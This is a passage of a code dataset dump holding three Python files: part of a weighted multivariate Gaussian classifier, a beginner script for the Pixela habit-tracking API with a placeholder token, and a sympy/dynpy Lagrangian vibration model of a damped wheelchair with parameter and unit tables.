T.shape #debug\n #print xm.shape #debug\n #print(T.head())\n Pred = (2*pi)**(-n/2) * np.linalg.det(Sigma2)**-0.5 * exp(-0.5 * (xm.dot(np.linalg.pinv(Sigma2)) * xm).sum(axis=1)) # TODO: fix this, it does not work with more than one sample to test at a time\n\n return {'Prediction': Pred} # return the class of the sample(s)\n\n ## Compute the weighted mean of the dataset\n # @param X Samples dataset\n # @param weights 
Vector/Series of weights (ie: number of times one sample has to be repeated) - default: X['framerepeat']\n def mean(self, X, weights=None):\n return UnivariateGaussian.mean(X, weights)\n\n ## Compute the unbiased weighted sample covariance matrix of the dataset\n # Alternative to pandas.DataFrame.cov(), because pandas's and numpy's cov() can't account for weights (if you set mean = X.mean() and weights = None, then you'll get the exact same result as X.cov())\n # Note: this works ONLY with unnormalized, integer weights >= 0 representing the number of occurrences of an observation (number of \"repeat\" of one row in the sample)\n # LaTeX equation: \\Sigma=\\frac{1}{\\sum_{i=1}^{N}w_i - 1}\\sum_{i=1}^N w_i \\left(x_i - \\mu^*\\right)^2\n # @param X One example or a dataset of examples (must the same columns/keys as mean)\n # @param mean Weighted mean (must have the same columns/keys as X, else you will get a weird result, because pandas will still try to adapt and things will get really messed up!)\n # @param weights Name of the weights column to remove from the final result (else it may flaw the computation of the prediction)\n # TODO: bigdata iteration version (detect generator?) - WARNING: then the division by m-1 must be done at the end of all the sums of all sigma2 of every x sample!\n @staticmethod\n def covar(X, mean, weights=None):\n if weights is None: weights = 'framerepeat'\n w = None\n if weights in X.keys(): w = X[weights] # backing up the keys\n if weights in X.keys() and weights not in mean.keys():\n if type(X) == pd.Series:\n ax = 0\n else:\n ax = 1\n X = X.drop(weights, axis=ax)\n xm = X-mean # xm = X diff to mean\n xm = xm.fillna(0) # fill nan with 0 because anyway 0 will give a 0 covariance's coordinate (which means in practical that it is null), but the computation of other covariance's coordinates will be OK (while if you have NaNs you would end up with a covariance matrix filled with NaNs)\n # BigData alternative: compute the covariance one sample at a time (one row with several columns representing different variables)\n #if type(X) == pd.Series:\n # sigma2 = np.outer(xm.T, xm); # force matrix multiplication outer product (else if you use np.dot() or pandas.dot(), it will align by the indexes and make the dot product)\n #else:\n\n # If there are weights, compute the unbiased weighted sample covariance\n if w is not None:\n sigma2 = 1./(w.sum()-1) * xm.mul(w, axis=0).T.dot(xm);\n # Else we compute the unbiased sample covariance (without weights)\n else:\n m = X.shape[0]\n sigma2 = 1./(m-1) * xm.T.dot(xm); # Sigma2 = 1/m * X' * X\n\n return sigma2\n","repo_name":"lrq3000/oacs","sub_path":"oacs/classifier/multivariategaussian.py","file_name":"multivariategaussian.py","file_ext":"py","file_size_in_byte":7091,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"31"} +{"seq_id":"23324681320","text":"from datetime import datetime\nimport os\n\nimport requests\n\nUSERNAME = 'ishkining'\nTOKEN = 'idontknowwhyilovetoeat'\nGRAPH_ID = 'graphtest1'\n\npixela_endpoint = 'https://pixe.la/v1/users'\n\nuser_params = {\n 'token': TOKEN,\n 'username': USERNAME,\n 'agreeTermsOfService': 'yes',\n 'notMinor': 'yes',\n}\n\n# response = requests.post(url=pixela_endpoint, json=user_params)\n# print(response.text)\n\ngraph_endpoint = f'{pixela_endpoint}/{USERNAME}/graphs'\n\ngraph_config = {\n 'id': GRAPH_ID,\n 'name': 'Test',\n 'unit': 'minutes',\n 'type': 'int',\n 'color': 'ajisai',\n}\n\nheaders = {\n 'X-USER-TOKEN': TOKEN\n}\n\n# response = 
requests.post(url=graph_endpoint, json=graph_config, headers=headers)\n# print(response.text)\n\npixel_creation_endpoint = f'{pixela_endpoint}/{USERNAME}/graphs/{GRAPH_ID}'\n\npixel_data = {\n 'date': datetime.now().strftime('%Y%m%d'),\n 'quantity': '10',\n}\n\n# response = requests.post(url=pixel_creation_endpoint, json=pixel_data, headers=headers)\n# print(response.text)\n\nupdate_endpoint = f'{pixela_endpoint}/{USERNAME}/graphs/{GRAPH_ID}/' \\\n f'{datetime(year=2022, month=7, day=26).strftime(\"%Y%m%d\")}'\n\nnew_pixel_data = {\n 'quantity': '5'\n}\n\n# response = requests.put(url=update_endpoint, json=new_pixel_data, headers=headers)\n# print(response.text)\n\npixel_delete_endpoint = f'{pixela_endpoint}/{USERNAME}/graphs/{GRAPH_ID}'\n\n# response = requests.delete(url=pixel_delete_endpoint, headers=headers)\n# print(response.text)","repo_name":"ishkining/100_days_of_python","sub_path":"days 31-40/day 37/habit_tracker.py","file_name":"habit_tracker.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"15918689077","text":"from sympy import (Symbol, symbols, Matrix, sin, cos, asin, diff, sqrt, S,\n diag, Eq, hessian, Function, flatten, Tuple, im, pi, latex,\n dsolve, solve, fraction, factorial, Subs, Number, oo, Abs,\n N, solveset)\n\nfrom sympy.physics.mechanics import dynamicsymbols, ReferenceFrame, Point\nfrom sympy.physics.vector import vpprint, vlatex\nfrom ...dynamics import LagrangesDynamicSystem, HarmonicOscillator, mech_comp\n\nfrom ..elements import MaterialPoint, Spring, GravitationalForce, Disk, RigidBody2D, Damper, PID, Excitation, Force, base_frame, base_origin\nfrom dynpy import * # enables mechanical models for mathematical modelling\n\n\nfrom sympy import * # provides mathematical interface for symbolic calculations\n\n\nfrom sympy.physics.mechanics import *\n\nimport sympy as sym\nimport numpy as np\nimport numpy.fft as fft\n\nimport matplotlib.pyplot as plt\nimport math\n\nfrom dynpy.utilities.report import SystemDynamicsAnalyzer\n\nimport pandas as pd\n\nfrom dynpy.utilities.adaptable import *\n\n\nfrom pint import UnitRegistry\nureg = UnitRegistry()\n\nix = pd.IndexSlice\n\n\n\nt,f= symbols('t, f')\n\n\nfrom .principles import ComposedSystem, NonlinearComposedSystem, base_frame, base_origin, REPORT_COMPONENTS_LIST\n#TODO? 
156\nclass DampedChair4DOF(ComposedSystem):\n\n scheme_name = 'chair5dof.jpg'\n real_name = 'gtm.png'\n \n z,phi,z_fr,z_rear,x=dynamicsymbols('z varphi z_f z_r x')\n M=Symbol('M', positive=True)\n m=Symbol('m', positive=True)\n m_b=Symbol('m_b', positive=True)\n m_k=Symbol('m_k', positive=True)\n m_fr=Symbol('m_fw', positive=True)\n m_rear=Symbol('m_rw', positive=True)\n I_ch=Symbol('I_ch', positive=True)\n I_w=Symbol('I_rw', positive=True)\n l_rod=Symbol('l_{rod}', positive=True)\n l_l=Symbol('l_l', positive=True)\n l_k=Symbol('l_k', positive=True)\n l_r=Symbol('l_r', positive=True)\n l_rear=Symbol('l_r', positive=True)\n l_bumps=Symbol('l_bumps', positive=True)\n l_fr=Symbol('l_fr', positive=True)\n l_b=Symbol('l_b', positive=True)\n k_r=Symbol('k_r', positive=True)\n k_rt=Symbol('k_rt', positive=True)\n k_f=Symbol('k_f', positive=True)\n k_ft=Symbol('k_ft', positive=True)\n c_rs=Symbol('c_rs', positive=True)\n c_fs=Symbol('c_fs', positive=True)\n c_rt=Symbol('c_rt', positive=True)\n c_ft=Symbol('c_ft', positive=True)\n c=Symbol('c', positive=True)\n F_engine=Symbol('F_{engine}', positive=True)\n k_p=Symbol('k_p', positive=True)\n k_l=Symbol('k_l', positive=True)\n F=Symbol('F_0', positive=True)\n A=Symbol('A', positive=True)\n omega=Symbol('omega', positive=True)\n Omega=Symbol('Omega', positive=True)\n z_l=Symbol('z_l', positive=True)\n z_p=Symbol('z_p',positive=True)\n z_b=Symbol('z_b',positive=True)\n s=Symbol('s', positive=True)\n ivar=Symbol('t')\n f=Symbol('f', positive=True)\n k=Symbol('k', positive=True)\n g=Symbol('g', positive=True)\n R=Symbol('R_rw', positive=True)\n amplitude=Symbol('amplitude',positive=True)\n length=Symbol('length',positive=True)\n speed=Symbol('speed',positive=True)\n Leng=Symbol('Leng',positive=True)\n k_rot=Symbol('k_rot',positive=True)\n F_1=Symbol('F_1',positive=True)\n F_2=Symbol('F_2',positive=True)\n v0=Symbol('v_0',positive=True)\n u0=Symbol('u_0',positive=True)\n z_c3=Symbol('z_c3',positive=True)\n xm_3=Symbol('xm_3',positive=True)\n t_l=Symbol('t_l',positive=True)\n delta_t=Symbol('delta_t',positive=True)\n l_ramp=Symbol('l_ramp',positive=True)\n axw=Symbol('axw',positive=True)\n pm=Symbol('PM',positive=True)\n M_m=Symbol('M_m',positive=True)\n K_m=Symbol('K_m',positive=True)\n C_m=Symbol('C_m',positive=True)\n T=Symbol('T')\n V=Symbol('V')\n D=Symbol('D')\n# xt=dynamicsymbols('qwe') #dummy variable for deleting t symbol from descriptions\n def __init__(self,\n m=None,\n M=None,\n m_k=None,\n m_fr=None,\n m_rear=None,\n m_b=None,\n I_ch=None,\n I_w=None,\n l_rod=None,\n l_l=None,\n l_r=None,\n l_fr=None,\n l_b=None,\n l_k=None,\n k_r=None,\n k_rt=None,\n k_f=None,\n k_ft=None,\n c_l=None,\n c_p=None,\n c_rt=None,\n c_ft=None,\n c=None,\n f=None,\n g=None,\n F_engine=None,\n ivar=Symbol('t'),\n z=None,\n x=None,\n s=None,\n phi=None,\n z_fr=None,\n z_rear=None,\n F=None,\n A=None,\n R=None,\n Omega=None,\n omega=None,\n z_l=None,\n z_p=None,\n z_b=None,\n l_bumps=None,\n amplitude=None,\n length=None,\n speed=None,\n Leng=None,\n k=None,\n k_rot=None,\n F_1=None,\n F_2=None,\n v0=None,\n u0=None,\n z_c3=None,\n xm_3=None,\n t_l=None,\n delta_t=None,\n l_ramp=None,\n axw=None,\n pm=None,\n# xt=None,\n **kwargs):\n \n if z is not None: self.z=z\n if x is not None: self.x=x\n if z_rear is not None: self.z_rear=z_rear\n if z_fr is not None: self.z_fr=z_fr\n if z_l is not None: self.z_l=z_l\n if z_p is not None: self.z_p=z_p\n if z_b is not None: self.z_b=z_b\n if phi is not None: self.phi=phi\n\n if M is not None: self.M = M # mass of a rod\n if 
m is not None: self.m = m\n if m_fr is not None: self.m_fr = m_fr\n if m_rear is not None: self.m_rear = m_rear\n if m_b is not None: self.m_b = m_b\n if m_k is not None: self.m_k = m_k\n if l_l is not None: self.l_l = l_l # offset of left spring\n if l_fr is not None: self.l_fr = l_fr\n if l_r is not None: self.l_r = l_r #offset of right spring\n if l_b is not None: self.l_b = l_b \n if l_k is not None: self.l_k = l_k \n if l_rod is not None: self.l_rod = l_rod\n if k_r is not None: self.k_r = k_r\n if k_rt is not None: self.k_rt = k_rt\n if k_f is not None: self.k_f = k_f\n if k_ft is not None: self.k_ft = k_ft\n if c_l is not None: self.c_l=c_l\n if c_p is not None: self.c_p=c_p\n if c_rt is not None: self.c_rt=c_rt\n if c_ft is not None: self.c_ft=c_ft\n if c is not None: self.c=c\n if F is not None: self.F=F\n if A is not None: self.A=A\n if R is not None: self.R=R\n if f is not None: self.f=f\n if g is not None: self.g=g\n if Omega is not None: self.Omega=Omega\n if omega is not None: self.omega=omega\n if I_ch is not None: self.I_ch = I_ch # moment of inertia of a rod\n if I_w is not None: self.I_w = I_w\n if F_engine is not None: self.F_engine = F_engine\n if l_bumps is not None: self.l_bumps = l_bumps\n if amplitude is not None: self.amplitude = amplitude\n if length is not None: self.length = length\n if speed is not None: self.speed = speed\n if Leng is not None: self.Leng = Leng\n if k is not None: self.k=k\n if k_rot is not None: self.k_rot=k_rot\n if F_1 is not None: self.F_1=F_1\n if F_2 is not None: self.F_2=F_2\n if v0 is not None: self.v0=v0\n if u0 is not None: self.u0=u0\n if z_c3 is not None: self.z_c3=z_c3\n if xm_3 is not None: self.xm_3=xm_3\n if t_l is not None: self.t_l=t_l\n if delta_t is not None: self.delta_t=delta_t\n if l_ramp is not None: self.l_ramp=l_ramp\n if axw is not None: self.axw=axw\n if pm is not None: self.pm=pm\n# if xt is not None: self.xt=xt\n self.s=self.A*sin(ivar*self.omega)\n self.qs=[self.z_fr,self.z_rear,self.x,self.z,self.phi]\n \n \n self.right_wheel = MaterialPoint(self.m_fr, pos1=self.z_fr, qs=[self.z_fr])\n self.left_wheel = MaterialPoint(self.m_rear, pos1=self.z_rear, qs=[self.z_rear])\n self.spring_pw = Spring(self.k_ft, pos1=self.z_fr, pos2=self.s, qs=[self.z_fr])\n self.spring_lw = Spring(self.k_rt, pos1=self.z_rear, pos2=self.s, qs=[self.z_rear])\n self.damper_pw = Damper(self.c_ft, pos1=self.z_fr, pos2=self.s, qs=[self.z_fr])\n self.damper_lw = Damper(self.c_rt, pos1=self.z_rear, pos2=self.s, qs=[self.z_rear])\n \n \n \n# self.body = RigidBody2D(self.m, self.I, pos_lin=self.z+self.x, pos_rot=self.phi, qs=[self.z, self.phi,self.x]) # rod\n self.body_hor= MaterialPoint(self.M, pos1=self.x, qs=[self.x])\n self.body_ver= MaterialPoint(self.M, pos1=self.z, qs=[self.z])\n self.body_rot= MaterialPoint(self.I_ch, pos1=self.phi, qs=[self.phi])\n self.front_wheel_hor=MaterialPoint(self.m_fr,pos1=self.x,qs=[self.x])\n self.rear_wheel_hor=MaterialPoint(self.m_rear,pos1=self.x,qs=[self.x])\n self.front_wheel_rot=MaterialPoint(self.I_w,pos1=self.x/self.R,qs=[self.x])\n# self.pasazer= MaterialPoint(self.m_k, pos1=self.z+self.phi*self.l_k, qs=[self.z, self.phi])\n self.spring_1 = Spring(self.k_r, pos1=self.z+self.phi*self.l_l , pos2 = self.z_rear , qs=[self.z, self.phi, self.z_rear]) # left spring\n self.spring_2 = Spring(self.k_f, pos1=self.z-self.phi*self.l_r , pos2 = self.z_fr , qs=[self.z, self.phi, self.z_fr])\n self.damper_1= Damper(self.c_rs, pos1=self.z+self.phi*self.l_l , pos2 = self.z_rear , qs=[self.z, self.phi, self.z_rear])\n 
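# NOTE: the elements above all share one small composition API; a hedged standalone sketch (assumed usage, consistent with the calls in this file):\n #   z = dynamicsymbols('z'); m, k, c = symbols('m k c', positive=True)\n #   quarter_model = MaterialPoint(m, pos1=z, qs=[z]) + Spring(k, pos1=z, qs=[z]) + Damper(c, pos1=z, qs=[z])\n # '+' merges the elements into a single Lagrangian system, exactly as 'system = ...' does below\n 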
self.damper_2 = Damper(self.c_fs, pos1=self.z-self.phi*self.l_r , pos2 = self.z_fr , qs=[self.z, self.phi, self.z_fr])\n self.damper_x=Damper(self.c,pos1=self.x,qs=[self.x])\n self.damper_z=Damper(self.c,pos1=self.z,qs=[self.z])\n self.damper_phi=Damper(self.c,pos1=self.phi,qs=[self.phi])\n self.force_1 = Force(self.F*(sign(cos(self.Omega*self.ivar)-self.pm)+1), pos1=self.x , qs=[self.x])\n self.gravitational_force = GravitationalForce(self.M, self.g, (self.z+self.z_c3)*cos(self.phi), qs = self.qs)\n# self.force_2 = Force(self.A*sin(ivar*self.omega), pos1=self.z_pw, qs=[self.z_pw])\n \n #self.force = Force(-self.F_engine, pos1=self.z - self.l_p * self.phi, qs=[self.z, self.phi])\n system = self.body_hor + self.body_ver + self.body_rot +self.spring_1 + self.spring_2 +self.damper_1+self.damper_2 + self.right_wheel + self.left_wheel + self.spring_pw+ self.spring_lw+self.damper_lw+self.damper_pw+self.damper_x +self.force_1+self.front_wheel_hor+self.front_wheel_rot + self.rear_wheel_hor + self.gravitational_force + self.damper_z + self.damper_phi\n\n super().__init__(**{'system':system,**kwargs})\n \n def get_param_values(self):\n default_data_dict={self.F:150,\n \n# c_mu:0.0001,\n# c_lam:0.0001,\n self.l_l:0.2,\n self.l_r:0.4,\n \n self.k_f:750000,\n self.k_ft:300000,\n self.k_r:750000,\n self.k_rt:109000,\n self.M:75,\n self.I_ch:9.479342+self.M*0.39*0.39,\n self.m_rear:1.5,\n self.m_fr:0.6,\n self.pm:0.1,\n self.Omega:0.3*np.pi*2,\n self.R:0.3,\n\n self.g:9.81,\n self.I_w:self.m_rear*self.R**2,\n self.l_fr:0.2,\n self.l_rear:0.01,\n self.u0:0.005,\n self.z_c3:0.01,\n self.l_bumps:0.15,\n self.amplitude:0.0165,\n self.length:0.19,\n self.speed:1.7,\n self.axw:0.47,\n self.c_ft:107,\n self.c_rt:5500,\n self.c_fs:107,\n self.c_rs:107,\n self.c:100,\n self.A:0.001*10,\n self.omega:4*np.pi,\n }\n \n return default_data_dict \n def get_table_values(self):\n default_data_dict={\n \n self.c:100,\n self.c_rt:5500,\n self.m_rear:1.5,\n self.M:75,\n self.k_ft:300000,\n self.k_r:750000,\n }\n \n return default_data_dict \n def symbols_description(self):\n self.sym_desc_dict = {\n self.m_fr:'front wheel mass',\n self.m_rear:'rear wheel mass',\n self.M:'''mass of the main body including user''',\n self.k_r:'rear wheel stiffness',\n self.k_rt:'rear wheel tire stiffness',\n self.k_f:'front wheel stiffness',\n self.k_ft:'front wheel tire stiffness',\n self.k_rot:'rotational stiffness',\n self.m:'wheelchair mass',\n self.k:'wheelchair stiffness',\n self.g:'gravitational acceleration',\n self.F_1:'initial force',\n self.F_2:'initial force',\n self.Omega:'driving force frequency',\n self.F:'disabled driver arm force',\n self.R:'rear wheel radius',\n self.v0:'wheelchair initial velocity ',\n self.u0:'road profil amplitude',\n self.I_ch:'''wheelchair's moment of inertia''',\n self.I_w:'''rear wheel moment of inertia''',\n self.z_c3:'''vertical distance between wheelchair's center of mass and constant reference height''',\n self.l_fr:'front wheelchair spring initial length',\n self.l_rear:'rear wheelchair spring initial length',\n# self.m_RC:'RapidChair drive rocker arm mass',\n# self.I_RC:'RapidChair drive moment of inertia',\n# self.l_RC:'Rapidchair drive rocker arm length',\n# self.k_RC:'RapidChair drive stiffness',\n# self.phi0:'initial rocker arm axis angle relative to horizontal plane',\n# self.m_w:'RapidChair drive wheel mass',\n# self.I_wrc:'RapidChair drive wheel moment of inertia',\n# self.r_w:'RapidChair drive wheel radius', #do sprawdzenia, nie jestem pewien\n# self.k_w:'RapidChair drive wheel 
stiffness',\n# self.k_fix:'fastening stiffness',\n# self.k_tire:'RapidChair drive wheel tire stiffness',\n self.c:'general resistance to motion coefficient',\n self.c_fs:'vertical damping coefficient of front suspension',\n self.c_rs:'vertical damping coefficient of rear suspension',\n self.c_ft:'vertical damping coefficient of caster band',\n self.c_rt:'vertical damping coefficient of rear tire',\n# self.c_mu:'inertia damping decrement',\n# self.c_lam:'stiffness damping decrement',\n self.xm_3:'center of mass location in x axis',\n self.l_l: r'offset of left spring',\n self.l_r: r'offset of right spring',\n# self.a_ox:'acceleration in x axis - longitudinal axis', # axle acc\n# self.a_oz:'acceleration in z axis - vertical axis',\n# self.a_rz:'acceleration of wishbone',\n# self.a_rcz:'????',\n self.t_l:'phase shift of the wheels',\n self.delta_t:'the moment of occurrence of the obstacle',\n self.l_ramp:'ramp length',\n self.l_bumps:'bumps length',\n self.amplitude:'????',\n self.length:'????',\n self.speed:'steady state velocity',\n self.axw:'wheelbase',\n self.pm:'force duty cycle',\n self.A:'ground forcing amplitude',\n self.Leng:'????',\n \n \n self.x:'main body center of mass horizontal displacement',\n self.z_fr:'front wheel vertical displacement',\n self.z_rear:'rear wheel vertical displacement',\n self.z:'main body center of mass vertical displacement',\n# self.z_wrc:'vertical displacement of the RapidChair driven wheel',\n self.phi:'angular displacement of the main mass',\n# self.phi_rc:'angular displacement of the RapidChair drive',\n# self.theta:'angular displacement of the RapidChair driven wheel',\n \n self.x.diff(t):'main body center of mass horizontal velocity',\n self.z_fr.diff(t):'front wheel vertical velocity',\n self.z_rear.diff(t):'rear wheel vertical velocity',\n self.z.diff(t):'main body center of mass vertical velocity',\n# self.z_wrc.diff(t):'vertical velocity of the RapidChair driven wheel',\n self.phi.diff(t):'angular velocity of the main mass',\n# self.phi_rc.diff(t):'angular velocity of the RapidChair drive',\n# self.theta.diff(t):'angular velocity of the RapidChair driven wheel',\n \n\n \n self.x.diff(t,t):'main body center of mass horizontal acceleration',\n self.z_fr.diff(t,t):'front wheel vertical acceleration',\n self.z_rear.diff(t,t):'rear wheel vertical acceleration',\n self.z.diff(t,t):'main body center of mass vertical acceleration',\n# self.z_wrc.diff(t,t):'vertical acceleration of the RapidChair driven wheel',\n self.phi.diff(t,t):'angular acceleration of the main mass',\n# self.phi_rc.diff(t,t):'angular acceleration of the RapidChair drivetrain',\n# self.theta.diff(t,t):'angular acceleration of the RapidChair driven wheel',\n# self.T:'overall kinetic energy',\n# self.V:'overall potential energy',\n Symbol('L',positive=True):'''Lagrange's function''',\n Symbol('v',positive=True):'''steady state velocity''',\n self.ivar:'time',\n self.T:'total kinetic energy',\n self.V:'total potential energy',\n self.D:'total dissipative potential',\n self.omega:'frequency of road profile'\n }\n return self.sym_desc_dict\n# def symbols_description(self):\n# self.sym_desc_dict = {\n# self.m: r'Sprung mass',\n# self.m_p: r'Front axle mass',\n# self.m_l: r'Rear axle mass',\n# self.m_b: r'Traction battery mass',\n# self.m_b: r'Passenger mass',\n# self.I: r'Moment of inertia',\n# self.l_rod: r'Axle length',\n# self.l_p: r'Distance from the front axle to the bus centre of gravity',\n# self.l_l: r'Distance from the rear axle to the bus centre of gravity',\n# self.l_b: 
r'Distance from the battery centre of gravity to the bus centre of gravity',\n# self.k_p: r'Stiffness coefficient of the front body spring',\n# self.k_l: r'Stiffness coefficient of the rear body spring',\n# self.k_pw: r'Stiffness coefficient of the front tyre',\n# self.k_lw: r'Stiffness coefficient of the rear tyre',\n# self.c_l: r'Damping coefficient of the front shock absorber',\n# self.c_l: r'Damping coefficient of the rear shock absorber',\n# self.c_lw: r'Damping coefficient of the rear tyre',\n# self.c_pw: r'Damping coefficient of the front tyre',\n# self.phi: r'Rotation angle of the sprung mass',\n# self.z: r'Vertical displacement of the sprung mass centre of gravity',\n# self.z_pw: r'Vertical displacement of the front wheel',\n# self.z_lw: r'Vertical displacement of the rear wheel',\n# self.z_b: r'Vertical displacement of the battery',\n# self.A: r'Amplitude of the forcing',\n# self.omega: r'Angular frequency of the forcing',\n# self.ivar: r'Time',\n# self.f: r'Forcing frequency',\n \n \n# }\n# return self.sym_desc_dict\n \nsys4=DampedChair4DOF()\ny=[sys4.q,sys4.z, sys4.z.diff(t,t)]\nic_list = [0.1,0.1,0,0,0.1,0.1,0,0]\nunits_dict = {\n sys4.F:ureg.kilogram*ureg.meter/ureg.second**2,\n #dyn_sys.c_mu:0.0001,\n #dyn_sys.c_lam:0.0001,\n sys4.l_l:ureg.meter,\n sys4.l_r:ureg.meter,\n sys4.k_f:ureg.newton/ureg.meter,\n sys4.k_ft:ureg.kilogram/ureg.second**2,\n sys4.k_r:ureg.newton/ureg.meter,\n sys4.k_rt:ureg.kilogram/ureg.second**2,\n sys4.c:ureg.newton*ureg.second/ureg.meter,\n sys4.c_fs:ureg.newton*ureg.second/ureg.meter,\n sys4.c_rs:ureg.newton*ureg.second/ureg.meter,\n sys4.c_ft:ureg.newton*ureg.second/ureg.meter,\n sys4.c_rt:ureg.newton*ureg.second/ureg.meter,\n sys4.I_ch:ureg.meter**2*ureg.kilogram,\n sys4.M:ureg.kilogram,\n sys4.m_rear:ureg.kilogram,\n sys4.m_fr:ureg.kilogram,\n sys4.Omega:ureg.radian/ureg.second,\n sys4.R:ureg.meter,\n #dyn_sys.z_c3:0.4,\n sys4.g:ureg.meter/ureg.second**2,\n sys4.I_w:ureg.meter**2*ureg.kilogram,\n sys4.l_fr:ureg.meter,\n sys4.l_rear:ureg.meter,\n #dyn_sys.u0:,\n sys4.l_bumps:ureg.meter,\n sys4.amplitude:ureg.meter,\n sys4.length:ureg.meter,\n sys4.speed:ureg.meter/ureg.second,\n #self.axw:0.47,\n sys4.Leng:ureg.meter,\n sys4.m:ureg.kilogram,\n sys4.k:(ureg.newton / ureg.meter),\n t:ureg.second,\n f:ureg.hertz,\n sys4.z:ureg.meter,\n sys4.phi: ureg.radian,\n sys4.z.diff(t,2):ureg.meter/ureg.second**2,\n sys4.phi.diff(t,2): ureg.radian/ureg.second**2,\n sys4.pm:ureg.meter/ureg.meter,\n sys4.u0:ureg.meter,\n }\n\n# units_dict = {sys4.m:ureg.kilogram,\n# sys4.m_p:ureg.kilogram,\n# sys4.m_l:ureg.kilogram,\n# sys4.m_b:ureg.kilogram,\n# sys4.m_k:ureg.kilogram,\n# sys4.A:ureg.meter,\n# sys4.k_l:(ureg.newton / ureg.meter),\n# sys4.k_lw:(ureg.newton / ureg.meter),\n# sys4.k_p:(ureg.newton / ureg.meter),\n# sys4.k_pw:(ureg.newton / ureg.meter),\n# sys4.c_l:(ureg.newton*ureg.second / ureg.meter),\n# sys4.c_lw:(ureg.newton*ureg.second / ureg.meter),\n# sys4.c_p:(ureg.newton*ureg.second / ureg.meter),\n# sys4.c_pw:(ureg.newton*ureg.second / ureg.meter),\n# sys4.omega:ureg.radian,\n# sys4.l_l:ureg.meter,\n# sys4.l_p:ureg.meter,\n# sys4.l_b:ureg.meter,\n# sys4.l_rod:ureg.meter,\n# sys4.I:(ureg.kilogram*ureg.meter*ureg.meter),\n# sys4.phi:ureg.radian,\n# sys4.z:ureg.meter,\n# sys4.z.diff(t,t):ureg.meter/ureg.second**2,\n# sys4.z_lw:ureg.meter,\n# sys4.z_pw:ureg.meter,\n# sys4.z_b:ureg.meter,\n# t:ureg.second,\n# f:ureg.hertz,\n \n# }\n\nunit=units_dict\n \nclass DampedChairDDOF(ComposedSystem):\n\n \n \n z,phi,z_pw,z_lw=dynamicsymbols('z, \\\\varphi 
z_pw z_lw')\n m=Symbol('m', positive=True)\n m_b=Symbol('m_b', positive=True)\n m_p=Symbol('m_p', positive=True)\n m_l=Symbol('m_l', positive=True)\n I=Symbol('I', positive=True)\n l_rod=Symbol('l_{rod}', positive=True)\n l_l=Symbol('l_l', positive=True)\n l_p=Symbol('l_p', positive=True)\n l_b=Symbol('l_b', positive=True)\n k_l=Symbol('k_l1', positive=True)\n k_lw=Symbol('k_lw', positive=True)\n k_p=Symbol('k_p1', positive=True)\n k_pw=Symbol('k_pw', positive=True)\n c_l=Symbol('c_l', positive=True)\n c_p=Symbol('c_p', positive=True)\n c_lw=Symbol('c_lw', positive=True)\n c_pw=Symbol('c_pw', positive=True)\n F_engine=Symbol('F_{engine}', positive=True)\n k_p=Symbol('k_p', positive=True)\n k_l=Symbol('k_l', positive=True)\n A=Symbol('A', positive=True)\n omega=Symbol('omega', positive=True)\n z_l=Symbol('z_l', positive=True)\n z_p=Symbol('z_p',positive=True)\n z_b=Symbol('z_b',positive=True)\n s=Symbol('s', positive=True)\n ivar=Symbol('t')\n \n def __init__(self,\n m=None,\n m_p=None,\n m_l=None,\n m_b=None,\n I=None,\n l_rod=None,\n l_l=None,\n l_p=None,\n l_b=None,\n k_l=None,\n k_lw=None,\n k_p=None,\n k_pw=None,\n c_l=None,\n c_p=None,\n c_lw=None,\n c_pw=None,\n F_engine=None,\n ivar=Symbol('t'),\n z=None,\n s=None,\n phi=None,\n z_pw=None,\n z_lw=None,\n A=None,\n omega=None,\n z_l=None,\n z_p=None,\n z_b=None,\n **kwargs):\n \n if z is not None: self.z=z\n if phi is not None: self.phi=phi\n \n\n if m is not None: self.m = m # mass of a rod\n if m_p is not None: self.m_p = m_p\n if m_l is not None: self.m_l = m_l\n if m_b is not None: self.m_b = m_b\n if l_l is not None: self.l_l = l_l # offset of left spring\n if l_p is not None: self.l_p = l_p #offset of right spring\n if l_b is not None: self.l_b = l_b \n if l_rod is not None: self.l_rod = l_rod\n if k_l is not None: self.k_l = k_l\n if k_lw is not None: self.k_lw = k_lw\n if k_p is not None: self.k_p = k_p\n if k_pw is not None: self.k_pw = k_pw\n if c_l is not None: self.c_l=c_l\n if c_p is not None: self.c_p=c_p\n if c_lw is not None: self.c_lw=c_lw\n if c_pw is not None: self.c_pw=c_pw\n if A is not None: self.A=A\n if omega is not None: self.omega=omega\n if I is not None: self.I = I # moment of inertia of a rod\n if F_engine is not None: self.F_engine = F_engine\n \n self.s=self.A*sin(ivar*self.omega)\n \n self.z_l=self.z+self.phi*self.l_l\n self.z_p=self.z-self.phi*self.l_p\n self.z_lw=(self.k_l*self.z_l)/(self.k_lw+self.k_l)\n self.z_pw=(self.k_p*self.z_p)/(self.k_pw+self.k_p)\n \n \n self.right_wheel = MaterialPoint(self.m_p, pos1=self.z_pw, qs=[self.z, self.phi])\n self.left_wheel = MaterialPoint(self.m_l, pos1=self.z_lw, qs=[self.z, self.phi])\n self.spring_pw = Spring(self.k_pw, pos1=self.z_pw, pos2=self.s, qs=[self.z, self.phi])\n self.spring_lw = Spring(self.k_lw, pos1=self.z_lw, pos2=self.s, qs=[self.z, self.phi])\n self.damper_pw = Damper(self.c_pw, pos1=self.z_pw, pos2=self.s, qs=[self.z, self.phi])\n self.damper_lw = Damper(self.c_lw, pos1=self.z_lw, pos2=self.s, qs=[self.z, self.phi])\n #self.spring=Spring(k,pos1,po2,qs)\n \n self.body = RigidBody2D(self.m, self.I, pos_lin=self.z, pos_rot=self.phi, qs=[self.z, self.phi]) # rod\n self.battery= MaterialPoint(self.m_b, pos1=self.z+self.phi*self.l_b, qs=[self.z, self.phi])\n self.spring_1 = Spring(self.k_l, pos1=self.z_l , pos2 = self.z_lw , qs=[self.z, self.phi]) # left spring\n self.spring_2 = Spring(self.k_p, pos1=self.z_p, pos2=self.z_pw, qs=[self.z, self.phi])\n self.damper_1=Damper(self.c_l, pos1=self.z_l , pos2 = self.z_lw , qs=[self.z, self.phi]) # left damper acts between z_l and the left wheel\n 
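# the massless-wheel coordinates z_lw and z_pw above come from a static balance of two springs in series:\n #   k_l*(z_l - z_lw) = k_lw*z_lw  =>  z_lw = k_l*z_l/(k_l + k_lw), and analogously for z_pw;\n # the same pair is equivalent to one spring of stiffness k_l*k_lw/(k_l + k_lw), which is exactly the k_l_zas/k_p_zas reduction used by DampedChairSimplifiedDDOF2 below\n 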
